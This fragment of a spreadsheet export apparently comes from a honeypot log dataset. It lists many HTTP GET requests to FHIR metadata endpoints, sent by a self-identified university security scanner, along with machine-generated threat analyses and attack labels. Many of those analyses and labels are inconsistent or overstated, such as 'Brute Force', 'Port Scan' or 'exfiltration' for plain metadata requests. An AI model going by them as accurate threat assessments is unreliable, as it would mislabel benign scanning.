'38.54.117.64', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/fhir/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '38.54.117.64', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseDstu3/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '38.54.117.64', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR2/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '185.74.222.213', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '185.74.222.213', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR4/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '185.74.222.213', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR5/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '109.123.229.33', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR3/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '109.123.229.33', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r3/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '109.123.229.33', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r2/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '109.123.229.33', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseDstu3/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '109.123.229.33', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/fhir/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '109.123.229.33', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR5/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '109.123.229.33', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r5/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '109.123.229.33', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '109.123.229.33', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR4/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '109.123.229.33', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseDstu2/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '109.123.229.33', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR2/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '103.113.68.70', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/fhir-server/api/v4/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '103.113.68.70', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r5/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '103.113.68.70', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/fhir/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '103.113.68.70', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR4/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '103.113.68.70', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseDstu3/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '103.113.68.70', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '103.113.68.70', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseDstu2/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '103.113.68.70', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r3/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '103.113.68.70', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r4/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '103.113.68.70', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r2/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '103.113.68.70', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR2/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '38.60.171.39', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/fhir/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '38.60.171.39', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR4/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '38.60.171.39', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r5/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '38.60.171.39', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR3/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '38.60.171.39', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r3/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '38.60.171.39', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r4/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '66.94.127.183', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/fhir-server/api/v4/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '66.94.127.183', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '149.102.153.168', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseDstu2/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '149.102.153.168', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r4/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '94.131.113.33', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/fhir-server/api/v4/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '94.131.113.33', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR4/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '144.126.148.5', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/fhir/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '144.126.148.5', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '144.126.148.5', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR5/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '144.126.148.5', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR2/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '38.54.117.64', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r2/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '154.26.156.60', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '154.26.156.60', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/fhir/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '154.26.156.60', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r4/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '154.26.156.60', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r5/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '154.26.156.60', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR4/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '154.26.156.60', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR5/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '154.26.156.60', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r3/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '154.26.156.60', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r2/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '154.26.156.60', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseDstu3/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '154.26.156.60', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/fhir-server/api/v4/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '154.26.156.60', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR2/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '154.26.156.60', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR3/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '154.26.156.60', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseDstu2/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '154.93.37.45', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/fhir/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '154.93.37.45', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseDstu2/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '154.93.37.45', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR4/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '154.93.37.45', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '154.93.37.45', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/fhir-server/api/v4/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fh</t>
  </si>
  <si>
    <t>::ffff:c1ae:5913</t>
  </si>
  <si>
    <t>No data provided for analysis. &amp;&amp; No log data provided, unable to analyze. &amp;&amp; An unknown entity is accessing a system's metadata, likely for reconnaissance or exploitation purposes. The user agent appears to be a security scanner from a specific organization. This suggests a potential scan of the system's metadata. &amp;&amp; No attempt to connect or transfer data over HTTPS was observed, indicating normal behavior for this service. 
The absence of an HTTP request is unusual as it typically indicates some form of communication with the service. 
This lack of activity could also be due to a configuration issue or network limitations restricting access. &amp;&amp; A GET request is being made to retrieve metadata from a system, potentially indicating reconnaissance or information gathering activity by an unknown entity. The unusual user-agent string suggests the request may not be legitimate. This could be a precursor to more malicious activities. &amp;&amp; A malicious scanner is probing the system for sensitive information, likely to identify vulnerabilities or exploit weaknesses in the FHIR metadata service. The User-Agent indicates it's a security scanner from FH Muenster. This activity suggests reconnaissance or potential exploitation of system resources. &amp;&amp; A GET request is being sent to a server's metadata endpoint, likely for reconnaissance or data gathering purposes. The User-Agent indicates it may be a security scanner or automated tool. This could be an attempt to gather information about the server and its services. &amp;&amp; An unknown user is attempting to access metadata from a server with an unusual User-Agent string, possibly indicating a security scanner or bot. The request uses HTTPS encryption, but the User-Agent's origin and purpose are suspicious. This could be a reconnaissance activity to gather information about the system. &amp;&amp; Malicious activity detected - an unknown client is making a GET request to access system metadata, potentially attempting to gather sensitive information about the server. The client is using a custom user agent to hide its identity. This could be a reconnaissance attempt by an attacker. &amp;&amp; A GET request was made to retrieve metadata from a server, which could be an attempt to gather information about the server's configuration or functionality. The User-Agent header suggests this is likely a security scanner. This behavior may indicate reconnaissance activity by an unauthorized party. &amp;&amp; An unknown user accessed the system's metadata using a GET request with a specific user agent, potentially attempting to gather information about the system. This activity could be reconnaissance for further attacks or data extraction. The unusual user agent suggests the involvement of an automated tool. &amp;&amp; An unknown host is making a GET request to the metadata endpoint of a FHIR server, possibly for reconnaissance or data scraping. The User-Agent suggests it's being done by a security scanner or malware. This could be an attempt to gather information about the system and its services. &amp;&amp; A GET request was sent to a metadata endpoint for FHIR server API, which could be an attempt to gather information about the system's configuration or data storage. The User-Agent header indicates that it may have been triggered by a security scanner, possibly used for reconnaissance purposes. This activity suggests probing or scanning for potential vulnerabilities. &amp;&amp; A scanner is probing the server for information about its FHIR API, likely attempting to identify vulnerabilities or configuration weaknesses. The GET request indicates a reconnaissance activity rather than an actual attack. This may be a precursor to more malicious behavior. &amp;&amp; A GET request is made to a FHIR server with an unusual User-Agent, indicating potential reconnaissance or data scraping activity. The FHIR server is likely running on the system being scanned. This could be part of a larger attack to harvest sensitive health-related information. &amp;&amp; The data indicates a GET request made to the metadata endpoint of a server. The request is likely from a security scanner or vulnerability tester, and is probably reconnaissance activity as part of a larger scanning operation. &amp;&amp; An attacker is scanning for a specific resource, likely to exploit vulnerabilities or exfiltrate data. The target system appears to be serving a metadata endpoint related to health records. This could be part of a reconnaissance effort by an attacker. &amp;&amp; An attacker is attempting to access a specific server, possibly for reconnaissance or exploitation. The target appears to be an FHIR (Fast Healthcare Interoperability Resources) server, which could indicate the intention is to compromise healthcare data. The user-agent string suggests this is automated activity from a security scanner. &amp;&amp; An attacker is attempting to retrieve metadata for a FHIR (Fast Healthcare Interoperability Resources) server, which could be used to probe or exploit the system. The request appears to be a reconnaissance attempt to gather information about the system's configuration and capabilities. This activity may indicate a malicious actor searching for vulnerabilities. &amp;&amp; An unknown device has accessed a sensitive metadata endpoint on a server, indicating potential reconnaissance or data exfiltration attempts. The request appears to be from a security scanner, but its true intentions are unclear. This may be a probe for vulnerabilities in the system. &amp;&amp; A GET request is made to a FHIR metadata endpoint, which may indicate a reconnaissance or information gathering activity by an unauthorized entity. The presence of the "FH Muenster/Security-Scanner" user agent suggests potential scanning or probing. This could be indicative of malicious intent to exploit vulnerabilities. &amp;&amp; Possible malicious activity involves an HTTP request for sensitive FHIR metadata, likely made by a security scanner. The IP address 94.131.118.77 attempts to access potentially vulnerable API endpoints. This could be a reconnaissance scan for exploitable APIs. &amp;&amp; An unknown user accessed a server on IP address 194.146.12.172, requesting metadata for an FHIR server using a suspicious User-Agent string indicating it may be a security scanner. This could be an information gathering activity prior to potential exploitation. The request was made over HTTPS with expected content and connection settings. &amp;&amp; A GET request is being made to a server, targeting its metadata. The request originates from an unfamiliar IP address and is likely made by a security scanner for reconnaissance purposes. &amp;&amp; An unknown user is making a GET request to retrieve metadata about the server's FHIR API. The user-agent suggests this is likely a security scanner or vulnerability tester. This could be an attempt to gather information for future exploitation. &amp;&amp; No recent HTTPS connection attempts were made, indicating the service is being ignored by potential attackers. No malicious activity was detected via this service. The lack of connection attempts suggests no interest from hackers to exploit this particular vulnerability or functionality. &amp;&amp; No malicious activity detected, as the log data indicates no HTTPS connection was attempted. This suggests that potential attackers did not attempt to exploit this service. The lack of activity is likely due to the honeypot's presence being undetected. &amp;&amp; There is no clear indication of malicious activity from this log entry as it indicates a lack of HTTPS-related data, suggesting either no activity or insufficient data to determine its validity. This may imply that the system did not attempt to connect over HTTPS. It does not provide any evidence of suspicious behavior. &amp;&amp; An unknown user is attempting to access a server's metadata. The request appears to be coming from an IP address that may be a malicious scanner or attacker. A user-agent string suggests the activity might be related to security scanning or probing. &amp;&amp; A GET request was made to the metadata endpoint of a server, which could be a reconnaissance attempt to gather information about the system. This type of activity is often associated with malicious intentions, such as identifying potential vulnerabilities. The user-agent suggests a security scanner or vulnerability assessment tool was used. &amp;&amp; A GET request is made to retrieve metadata from a server, possibly indicating reconnaissance or information gathering by an attacker. The request contains a custom User-Agent string, which may be used to evade detection. This could be part of a larger attack chain. &amp;&amp; Possible malicious activity: An unknown user agent accessed a specific resource, attempting to retrieve metadata in a GET request. This could be related to reconnaissance or data gathering. The unusual user agent suggests potential exploitation of the system. &amp;&amp; A GET request is being made to the metadata endpoint of a healthcare system, which could be an attempt to gather information about the system's configuration and potentially exploit vulnerabilities. This behavior is unusual as metadata endpoints are typically not accessible from external networks. It may indicate probing or reconnaissance activity by malicious actors. &amp;&amp; An unauthorized scanner is probing the system for sensitive health information, likely as reconnaissance before a larger attack. The user-agent indicates it's a security scanner from FH Muenster in Germany. The request is for metadata related to healthcare data. &amp;&amp; A GET request is made to a FHIR metadata endpoint, possibly for reconnaissance or data harvesting purposes, potentially indicating an attempt to exploit the service. The request appears legitimate as it uses a common content type and accepts JSON response, but the User-Agent indicates a security scanner, raising suspicion. This activity may be indicative of initial probing before more malicious activity ensues. &amp;&amp; A GET request was made to the /fhir/metadata endpoint, suggesting an attempt to gather information about the server's metadata. The request originated from a suspicious user agent and IP address. This could be indicative of reconnaissance activity by a malicious entity. &amp;&amp; An unknown user on the internet is accessing metadata from a server that appears to be hosting medical data in a specific format. This access is likely unauthorized and may indicate an attempt to gather sensitive information. The request is made using a custom or unusual user agent, suggesting potential malicious intent. &amp;&amp; A GET request is made to a server on IP address 94.131.113.33, accessing metadata for healthcare-related services, which may be a reconnaissance attempt by an attacker. The request is made through a security scanner, indicating potential malicious intent. This could be part of a larger attack on healthcare systems. &amp;&amp; An unknown user accessed a sensitive server with potential FHIR metadata, possibly to map and understand the system's internal workings. This could be a reconnaissance attempt for future exploitation. The user appears to be using a security scanner to gather information. &amp;&amp; An unknown user is attempting to access a specific metadata resource on the monitored system, potentially gathering information for malicious purposes. The request appears to be coming from an IP address with no prior known association. The request headers indicate a potential health-related application, but the user agent suggests it may be a security scanner. &amp;&amp; Malicious entity accessed a server to retrieve metadata, likely for reconnaissance purposes, using a suspicious user agent and HTTPS protocol. This could be an initial scan before launching a more targeted attack. The request originated from IP address 154.90.63.129. &amp;&amp; A GET request is being made to a server, possibly attempting to gather information about the system's metadata. This could be reconnaissance for further exploitation. The user agent suggests it may be an automated scanning tool. &amp;&amp; A GET request is being sent to a metadata endpoint on a server with IP address 156.244.8.69, possibly indicating reconnaissance or information gathering activity. The request is from a user agent associated with a security scanner, suggesting it may be automated and malicious in nature. The FHIR protocol is used for health care data exchange, which could be the target of this inquiry. &amp;&amp; A GET request is made to a healthcare metadata endpoint, which may be a reconnaissance attempt by an attacker to gather information about the system. The User-Agent header suggests it's likely a vulnerability scanner. This activity could indicate preparation for potential exploitation. &amp;&amp; This log data indicates a potential reconnaissance attempt, where an unknown user is gathering information about the system's capabilities and resources. The request targets metadata related to FHIR (Fast Healthcare Interoperability Resources), which could be used for further exploitation or attacks. This activity suggests malicious intent to gather sensitive information. &amp;&amp; A GET request is being made to the server with a suspicious user agent indicating it's likely a security scanner. The request is for metadata related to FHIR (Fast Healthcare Interoperability Resources), which could be legitimate but warrants further investigation due to the unusual user agent. &amp;&amp; Possible malicious activity: An unknown user is accessing a service on the monitored system, using an unusual User-Agent string that suggests it may be a security scanner. The request is for metadata related to the FHIR healthcare standard, which could be indicative of reconnaissance or data collection. The host accessing the system is from an IP address outside typical geographic ranges. &amp;&amp; An unknown user is making a GET request to retrieve metadata from the system, which could be an attempt to gather information about the system's architecture or identify vulnerabilities. The user agent suggests it may be a security scanner. This activity may indicate reconnaissance. &amp;&amp; A GET request was made to a server hosting FHIR metadata, potentially for data harvesting or reconnaissance purposes. 
The requesting user agent suggests it may be a security scanner, but its presence is still suspicious. 
This could be an attempt to identify and target vulnerable systems. &amp;&amp; Malicious actor is attempting to access a potentially sensitive metadata endpoint with a GET request, possibly for reconnaissance or data gathering. This could be an attempt to identify vulnerabilities in the system. The User-Agent suggests it may be part of a security scanner or vulnerability assessment tool. &amp;&amp; This data indicates a GET request to the metadata of an FHIR server, possibly made by a security scanner or vulnerability testing tool. This could be part of reconnaissance or scanning activity. The request is likely legitimate but may also be used as a probing mechanism for potential vulnerabilities. &amp;&amp; An unknown user is making a GET request to a sensitive server endpoint, potentially retrieving metadata about the system's configuration. This could be a reconnaissance attempt by an attacker. The request appears to be coming from an unusual or fake user agent. &amp;&amp; This log indicates a lack of HTTP traffic, suggesting an unusual or potential malicious absence of expected communication for this service. It is likely a probe or reconnaissance attempt to identify the service's status and vulnerability. This could be an initial step in a more complex attack. &amp;&amp; A potential FHIR-based medical data exfiltration attempt has been detected, involving a GET request to retrieve metadata from the server. The user agent suggests it's likely a security scanner or vulnerability tester, but this could be used as a cover for malicious activity. &amp;&amp; A GET request is made to a specific endpoint, likely retrieving metadata, with an unusual User-Agent indicating potential scanning activity. The request includes an Accept header for application/fhir+json, which may be related to health information systems. This could be indicative of reconnaissance or data harvesting. &amp;&amp; No log data provided, so there is no activity to analyze. &amp;&amp; A GET request was made to a specific URL, indicating potential probing or reconnaissance activity.
The request includes a unique user agent string suggesting it might be automated or malicious software.
The specified URL is likely related to health information exchange, possibly targeting sensitive medical data. &amp;&amp; A scanner is attempting to retrieve metadata from the system, which could be a reconnaissance step before a more malicious attack. This activity is likely probing for vulnerabilities in the system's API. The user-agent indicates it is a security scanner. &amp;&amp; An unknown user is accessing a server, likely for reconnaissance or testing, with an unusual request for metadata about the system's structure. The request is made through a custom client that identifies itself as a security scanner from a specific organization. This behavior may indicate a scan or probing activity.</t>
  </si>
  <si>
    <t>I don't have any log data provided to analyze. If you provide the actual log data, I'll be happy to help identify the types of attacks based on the activity. &amp;&amp; I'd need some actual log data to analyze, but since you provided "NA", I'll have to wait for more information. 
Please provide the log data and I'll be happy to help with analyzing it! &amp;&amp; Unknown Target &amp;&amp; Port Scan &amp;&amp; FHIR Scanner &amp;&amp; Scan Attempt &amp;&amp; Port Scanner &amp;&amp; Web Scan &amp;&amp; Web Scanning &amp;&amp; Scanning GET &amp;&amp; Scanning Attack &amp;&amp; Scanning GET &amp;&amp; Port Scan &amp;&amp; Scan Attempt &amp;&amp; Brute Force &amp;&amp; Unknown Attack &amp;&amp; Scanning Attack &amp;&amp; FHIR Scanner &amp;&amp; Port Scan &amp;&amp; Port Scan 
Unauthorized &amp;&amp; Port Scanning &amp;&amp; Scan Attempt &amp;&amp; Port Scan &amp;&amp; Scan Attempt &amp;&amp; FHIR Scanning &amp;&amp; Scanning FHIR &amp;&amp; Port Scanning &amp;&amp; Port Scanning &amp;&amp; FHIR Scanner &amp;&amp; Port Scan &amp;&amp; HTTP Scanning &amp;&amp; Port Scan 
Scanning Port &amp;&amp; No Attack Found &amp;&amp; Port Scan</t>
  </si>
  <si>
    <t>749d918729f341579a37d657d81569e2</t>
  </si>
  <si>
    <t>94.249.68.50</t>
  </si>
  <si>
